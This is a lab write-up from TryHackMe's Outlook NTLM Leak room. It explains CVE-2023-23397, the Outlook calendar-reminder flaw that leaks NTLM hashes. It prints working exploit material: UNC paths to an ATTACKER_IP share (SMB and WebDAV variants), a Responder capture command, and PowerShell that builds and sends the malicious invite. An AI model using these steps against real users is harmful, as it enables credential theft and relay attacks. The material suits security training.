We covered the recent Microsoft Outlook NTLM Vulnerability CVE-2023-23397 that could lead to NTLM hash leak if successful. Also we covered a demo scenario in addition to mitigation and detection. This was part of TryHackMe Outlook NTLM Leak.
On Tuesday, March 14th, Microsoft released 83 security fixes on Patch Tuesday, including CVE-2023-23397. This critical vulnerability impacts all versions of the Outlook desktop app on any Windows system. Outlook web app (OWA) and Microsoft 365 aren’t vulnerable since they do not support NTLM authentication.
Unlike most exploits, this one is particularly dangerous because it is a zero-click exploit, meaning no user interaction is required to trigger it. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system and escalate privileges.
To exploit this vulnerability, an attacker must create a malicious calendar invitation that includes a reference to a sound file pointing to a file in a network share in the attacker’s machine. At a low level, an Outlook email stores the reference to the sound file in an internal parameter called PidLidReminderFileParameter. To ensure that the audio we embed in our malicious email will take precedence over the victim’s default reminder configurations, we will also need to set another parameter called PidLidReminderOverride to true.
To set up the PidLidReminderFileParameter property to point to a network share, the attacker can specify a Universal Naming Convention (UNC) path instead of a local file. UNC is used in Windows operating systems to find network resources (files, printers, shared documents). These paths consist of a double backslash, the IP address or name of the computer hosting the resource, the share name and the file name. For example:
\\ATTACKER_IP\foo\bar.wav
When the victim receives the malicious email, the UNC path directs them to that SMB share, triggering the vulnerability. This causes the system to start an NTLM authentication process against the attacker’s machine, leaking a Net-NTLMv2 hash that the attacker can later try to crack.
If for some reason the SMB protocol isn’t a viable alternative to use, non-server versions of Windows will accept using UNC paths pointing to ports 80 or 443, and use HTTP to retrieve the file from a WebDAV-enabled web server. The syntax of such UNC path is as follows:
\\ATTACKER_IP@80\foo\bar.wav
\\ATTACKER_IP@443\foo\bar.wav
This may be useful to bypass firewall restrictions preventing outgoing connections to port 445 (SMB).
Setting up Responder
Since we expect the victim to trigger an authentication attempt against the attacker on port 445, we will set up Responder to handle the authentication process and capture the NetNTLM hash for us. If you are unfamiliar with Responder, it will simply emulate an SMB server and capture any authentication attempt against it.
To launch Responder to listen for authentication attempts in your ens5 interface, you can simply run the following command in your AttackBox:
root@attackbox$ responder -I ens5We are now ready to trigger an authentication attempt via the Outlook vulnerability.
Attempting to Handcraft a Malicious Appointment
As a first attempt, we could manually create an appointment and edit the path to the reminder’s sound file to point to a shared folder. To create an appointment, you will first need to click on the calendar and then on the New Appointment button on the taskbar.
We will create an appointment that includes a reminder set in 0 minutes so that it triggers right after the victim receives it. We will also click on the Sound option to configure the reminder’s sound file
We can try setting the sound file path to a UNC path that points to our AttackBox and click the OK button
However, Outlook will silently ignore the UNC path and revert to using the default WAV file, which can be confirmed by going back to the Sound dialogue
Since Outlook isn’t expecting users to input a UNC path here, it probably discards our attempt as invalid output. But not all hope is lost!
OutlookSpy to the Rescue
Even if Outlook cannot set the reminder’s sound file to a UNC path, we can use the OutlookSpy plugin to achieve this. This plugin will allow you to access all of Outlook’s internal parameters directly, including the reminder’s sound file.
You can find OutlookSpy’s installer in your machine’s desktop. You will need to install it manually before proceeding. Be sure to close Outlook before running the installer.
To view our current appointment from OutlookSpy, click the OutlookSpy tab and then the CurrentItem button in the taskbar:
Note: Be sure to click the CurrentItem button from within the appointment, or you might modify different Outlook components.
From this window, you can see the parameters associated with the appointment’s reminder. We want to set the ReminderSoundFile parameter to the UNC path that points to our AttackBox and set both the ReminderOverrideDefault and ReminderPlaySound to true. Just for reference, here’s what each parameter does:
- ReminderPlaySound: boolean value that indicates if a sound will be played with the reminder.
- ReminderOverrideDefault: boolean value that indicates the receiving Outlook client to play the sound pointed by ReminderSoundFile, instead of the default one.
- ReminderSoundFile: string with the path to the sound file to be used. For our exploit, this will point to a bogus shared folder in our AttackBox.
We can use the script tab and the following script to change the parameters to the required values
Be sure to click the Run button for the changes to be applied. You can go back to the Properties tab to check that the values were correctly changed. Finally, save your appointment to add it to your calendar, making sure the reminder is set to 0 minutes and that the appointment matches the current time and date, as we want it to trigger immediately
If all went as expected, you should immediately see a reminder popping up
And you should receive the authentication attempt in your Responder console on your AttackBox
Exploitation
Summarising the steps required to exploit the vulnerability, an attacker would need to:
- Create a malicious meeting/appointment with a custom reminder sound pointing to a UNC path on the attacker’s machine.
- Send the invite to the victim via email.
- Wait for the reminder to trigger a connection against the attacker’s machine.
- Capture the Net-NTLMv2 hash, use authentication relaying, or profit in any other way.
Steps 3 and 4 are already covered for us by Responder, but handcrafting the malicious appointment by hand is a bit tedious. Luckily, a couple of exploits are readily available for us to create and send a malicious appointment.
In this task, we will look at the exploit published by Oddvar Moe, which is probably the easiest to understand and use. This Powershell exploit leverages Outlook’s COM objects to build emails and appointments easily. It contains a couple of functions that we can use:
- Save-CalendarNTLMLeak: This function creates a malicious appointment and saves it to your own calendar. Useful for testing purposes.
- Send-CalendarNTLMLeak: This function creates a malicious appointment and sends it via email to a victim. The email invitation will be sent from your Outlook’s current default account.
Dissecting the Exploit’s Code
Both will create an appointment similarly, so we’ll explain the Save-CalendarNTLMLeak only.
First, we will instantiate an “Outlook.Application” object and create an appointment.
$Outlook = New-Object -comObject Outlook.Application
$newcal = $outlook.CreateItem('olAppointmentItem')The usual parameters of an appointment will be set. These include the recipients, meeting subject, location, body and start and end dates. The exploit sets the start day to the current time so that the reminder is triggered immediately:
$newcal.Recipients.add($recipient)
$newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
$newcal.Subject = $meetingsubject
$newcal.Location = "Virtual"
$newcal.Body = $meetingbody
$newcal.Start = get-date
$newcal.End = (get-date).AddHours(2)The following additional parameters will be configured to point the reminder’s sound file to the attacker’s server, as previously explained:
$newcal.ReminderSoundFile = $remotefilepath
$newcal.ReminderOverrideDefault = 1
$newcal.ReminderSet = 1
$newcal.ReminderPlaysound = 1Finally, the appointment will be sent to the recipient via email:
$newcal.send()Using the Exploit
You can import the exploit’s functions with the Import-Module cmdlet. After that, both functions will be available in your current Powershell. To send an email with a malicious appointment, you can just run the following command:
PS C:\> cd C:\Users\Administrator\Desktop\
PS C:\Users\Administrator\Desktop\> Import-Module .\CVE-2023-23397.ps1
PS C:\Users\Administrator\Desktop\> Send-CalendarNTLMLeak -recipient "test@thm.loc" -remotefilepath "\\ATTACKER_IP\foo\bar.wav" -meetingsubject "THM Meeting" -meetingbody "This is just a regular meeting invitation :)"Be sure to replace ATTACKER_IP with the IP address of your AttackBox in the -remotefilepath parameter. Notice that you are using the exploit to send yourself an email in this case, as we have a single account in the machine, but normally you would target other email addresses.
Since the exploit makes use of the current Outlook instance to send the email, you will likely get a couple of alerts asking you to grant permission to the script to send emails on your behalf. Make sure to press Allow as many times as needed. Marking the “Allow access for 10 minutes” checkbox should also help speed this process up
Video Walkthrough